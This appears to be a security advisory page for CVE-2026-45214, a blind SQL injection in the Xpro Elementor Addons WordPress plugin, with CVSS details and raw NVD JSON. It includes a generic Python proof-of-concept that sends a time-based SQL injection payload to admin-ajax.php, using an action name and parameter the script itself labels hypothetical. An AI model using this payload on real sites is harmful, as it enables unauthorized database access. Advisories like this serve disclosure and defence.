Security Vulnerability Report
中文
CVE-2026-45214 CVSS 8.5 HIGH

CVE-2026-45214

Published: 2026-05-12 11:16:21
Last Modified: 2026-05-12 14:03:53

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows Blind SQL Injection.This issue affects Xpro Elementor Addons: from n/a through <= 1.5.1.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Xpro Elementor Addons <= 1.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # This is a generic PoC for Blind SQL Injection in the affected plugin. # Actual vulnerable parameters and endpoints may vary. target_url = "http://example.com" vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Time-based blind SQL injection payload # Attempting to cause a 5-second delay if the vulnerability exists payload = "1' AND (SELECT SLEEP(5))-- -" params = { "action": "xpro_elementor_get_data", # Hypothetical action name "id": payload # Hypothetical vulnerable parameter } try: print(f"[+] Sending payload to {vulnerable_endpoint}") response = requests.get(vulnerable_endpoint, params=params, timeout=10) # Check if the response time indicates successful SQL execution if response.elapsed.total_seconds() >= 5: print("[!] Vulnerability Confirmed: Server response delayed.") else: print("[-] Vulnerability not detected or payload incorrect.") except requests.exceptions.RequestException as e: print(f"[Error] {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45214", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.853", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows Blind SQL Injection.This issue affects Xpro Elementor Addons: from n/a through <= 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/xpro-elementor-addons/vulnerability/wordpress-xpro-elementor-addons-plugin-1-5-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}